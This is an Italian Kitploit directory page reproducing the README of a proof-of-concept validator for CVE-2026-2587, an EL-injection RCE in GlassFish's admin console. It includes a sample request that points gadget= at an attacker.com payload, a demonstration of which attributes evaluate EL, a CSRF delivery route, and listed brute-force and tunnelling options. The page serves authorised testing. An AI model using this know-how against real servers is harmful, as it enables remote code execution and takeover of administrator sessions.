Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-2587-Exploit-POC — Validatore PoC per CVE-2026-2587 per Eclipse GlassFish EL Injection RCE nel gestore gadget.jsf della console di amministrazione. Scanner di vulnerabilità sicuro e autenticato per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/bhanunamikaze/cve-2026-2587-exploit-poc
Scanner di VulnerabilitàAnalisi Dinamica (Sandboxing)Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
Lab e Pratica
GitHubbhanunamikaze/cve-2026-2587-exploit-poc

CVE-2026-2587-Exploit-POC

Validatore PoC per CVE-2026-2587 per Eclipse GlassFish EL Injection RCE nel gestore gadget.jsf della console di amministrazione. Scanner di vulnerabilità sicuro e autenticato per test autorizzati.

Vedi RepositorySito web
1104 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-2587 Exploit PoC — Validatore RCE tramite EL Injection su Eclipse GlassFish

Validatore PoC sicuro per CVE-2026-2587, una vulnerabilità critica di EL Injection / RCE che colpisce la gestione dei gadget della console amministrativa di Eclipse GlassFish tramite /common/gadgets/gadget.jsf.

Questo strumento aiuta i team di sicurezza a convalidare l'esposizione a CVE-2026-2587 in ambienti autorizzati utilizzando un canarino EL aritmetico benigno.

Assegnato da: Eclipse Foundation (CNA) · Pubblicato: 19 maggio 2026 CVSS: 9.6 Critical · AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H CWE: CWE-917 — Injection del Linguaggio Espressione Versioni interessate: Sconosciuto nell'avviso pubblico al 21 maggio 2026 Versioni corrette: Sconosciuto nell'avviso pubblico al 21 maggio 2026 Regola dello scanner: la versione è solo contesto di instradamento/segnalazione; la sentenza richiede prova.


Indice

  • Riepilogo della vulnerabilità
  • Come funziona
  • Requisiti di autenticazione
  • Configurazione
  • Ambiente di laboratorio (Docker)
  • Generazione di un XML di prova
  • Utilizzo — Singolo target
    • Localhost / Docker
    • Credenziali
    • Login a forza bruta
    • Remoto tramite tunnel Cloudflare
    • XML statico pre-ospitato
    • Remoto tramite ngrok (ultima risorsa)
    • Solo controllo non autenticato
  • Utilizzo — Multipli target
    • Formato file target
    • Scansione parallela
  • Formati di output
    • Console
    • CSV
    • JSON
    • Combinazione output
  • Opzioni avanzate
    • Rilevamento endpoint e versione
    • Valori canarino personalizzati
    • Intestazioni personalizzate
  • Casi di test
  • Interpretazione output
  • Verifica manuale
  • Rimedio
  • Riferimenti
  • Dichiarazione di esclusione

Riepilogo della vulnerabilità

Una vulnerabilità critica di esecuzione remota di codice esiste nel gestore gadget della console amministrativa di GlassFish. L'applicazione elabora file .xml recuperati da un URL fornito tramite il parametro di query gadget= e valuta i valori forniti dall'utente all'interno degli attributi <ModulePrefs> attraverso il motore Java Expression Language (EL) senza sanitizzazione o escaping.``` GET /common/gadgets/gadget.jsf?gadget=http://attacker.com/payload.xml

Se l'XML contiene `#{7*7}` in un attributo `<ModulePrefs title="">`, GlassFish lo valuta lato server e restituisce `49` — confermando l'esecuzione di EL. Una catena RCE completa segue attraverso l'accesso di EL al runtime Java.

Gli attuali avvisi pubblici non pubblicano un confine di versione affetta o corretta.
Questo validatore è quindi proof-first: identifica GlassFish e
riporta i metadati della versione, ma non classifica un obiettivo come vulnerabile basandosi solo sulla stringa di versione.

---

## Come Funziona

![Safe validation workflow for CVE-2026-2587](https://assets.kitploit.com/production/public/readmes/15612/d24fad85e9cfd24152f916ba71622ed442636e171c4e912ad5ffd7d973f9a6ba.png)

Il percorso di validazione sicura ospita una sonda XML benigna, invia una richiesta autenticata alla console di amministrazione verso `gadget.jsf`, consente a GlassFish di recuperare quell'XML dall'URL di callback e verifica se il canarino `<ModulePrefs title="">` valuta da `#{7*7}` a `49`.

**Punto di iniezione confermato vs. non confermato:**```xml
<!-- ✅ EL IS evaluated -->
<ModulePrefs title="#{7*7}" />              <!-- returns 49 -->
<ModulePrefs description="#{7*7}" />        <!-- returns 49 -->

<!-- ❌ EL NOT evaluated -->
<Content type="html">
  <![CDATA[ #{7*7} ]]>                      <!-- returns #{7*7} literally -->
</Content>

Requisiti di Autenticazione

ScenarioAutenticazione necessaria?
Colpo diretto a gadget.jsfSì — autenticazione FORM, pagina di login 200
Attacco CSRF nel mondo realeNo — sfrutta la sessione attiva dell'amministratore
Questo validatoreSì — --cookie o --username/--password
Verifica esposizione non autenticataNo — lo script lo testa automaticamente

Il vettore CVSS PR:N / UI:R significa:

  • PR:N — l'attaccante non necessita di nessuna credenziale propria
  • UI:R — un amministratore connesso deve interagire (consegna CSRF)

Per la validazione in laboratorio, salta del tutto il CSRF — usa direttamente la tua sessione di amministratore.


Configurazione

Requisiti: Python 3.9+ · `requests````bash git clone https://github.com/Bhanunamikaze/CVE-2026-2587-Exploit-POC cd CVE-2026-2587-Exploit-POC pip install requests

optional for coloured terminal output:

pip install colorama

**Contenuti del repository:**```
CVE-2026-2587-Exploit-POC/
├── assets/
│   └── cve-2026-2587-validation-flow.png  ← README workflow diagram
├── CVE-2026-2587-Exploit-POC.py   ← main script
├── probe.xml                   ← ready-to-host static probe XML
├── targets.txt.example         ← multi-target file template
└── README.md

Ambiente di Laboratorio (Docker)

Caveat: GHSA elenca ancora le versioni affette e corrette come sconosciute. omnifish/glassfish:7.0.15 è un buon candidato per il laboratorio — non una build garantita vulnerabile. La primitiva di validazione rimane il canarino aritmetico: se #{7*7} restituisce 49, EL è attivo.

Opzione A — docker compose (consigliato)```bash

from the repo root

docker compose -f docker-compose.lab.yml up

Avvia GlassFish 7.0.15 con porte vincolate solo a `127.0.0.1` e `host.docker.internal` preconfigurato in modo che il container possa raggiungere il tuo server XML locale.

### Opzione B — bare docker run```bash
docker run --rm \
  --name gf-cve-2026-2587-lab \
  -p 127.0.0.1:8080:8080 \
  -p 127.0.0.1:4848:4848 \
  --add-host=host.docker.internal:host-gateway \
  omnifish/glassfish:7.0.15

Console di amministrazione: https://localhost:4848 · Login: admin / admin (Certificato autofirmato — il browser mostrerà un avviso.)


Fornisci il probe XML benigno

In un secondo terminale:```bash

The repo ships with probe.xml — serve it directly:

python3 -m http.server 8000 --bind 0.0.0.0

Verifica la raggiungibilità dal punto di vista del container:```bash
docker exec gf-cve-2026-2587-lab \
  curl -s http://host.docker.internal:8000/probe.xml | head -5

Attivazione manuale

Scarica lo strumento